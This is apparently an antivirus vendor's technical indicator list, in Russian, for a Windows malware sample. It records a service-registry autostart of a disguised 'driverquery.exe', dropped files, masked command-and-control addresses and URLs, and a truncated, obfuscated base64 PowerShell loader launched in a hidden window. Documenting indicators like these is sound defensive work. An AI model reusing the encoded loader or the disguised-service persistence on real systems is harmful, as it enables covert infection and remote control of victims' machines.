Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\driverquery] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\driverquery] 'ImagePath' = '"%WINDIR%\SysWOW64\taskeng\driverquery.exe"'
- 'driverquery' "%WINDIR%\SysWOW64\taskeng\driverquery.exe"
- 'driverquery' %WINDIR%\SysWOW64\taskeng\driverquery.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABZAFUATgBDAEwAbABoAHgAPQAnAEUASQBBAFYARQB2AHgAdgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYABjAGAAVQBSAEkAVAB5AGAAUAByAE8AdABvAGAAYwBPAEwAIgAgAD...
- %HOMEPATH%\920.exe
- %WINDIR%\syswow64\taskeng\driverquery.exe
- %HOMEPATH%\920.exe в %WINDIR%\syswow64\taskeng\driverquery.exe
- '17#.#7.81.212':443
- '74.##7.230.187':8080
- http://w3##t.com/dtla/bBmTEkbPK/
- http://74.###.230.187:8080/b51cDm6a1i/X4r14aQU0xo1/JlwUVk2eqI9J/V8bljH63/LIAKjA/ via 74.##7.230.187
- DNS ASK w3##t.com
- '%HOMEPATH%\920.exe'
- '%WINDIR%\syswow64\taskeng\driverquery.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABZAFUATgBDAEwAbABoAHgAPQAnAEUASQBBAFYARQB2AHgAdgAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAEUAYABjAGAAVQBSAEkAVAB5AGAAUAByAE8AdABvAGAAYwBPAEwAIgAgAD...' (со скрытым окном)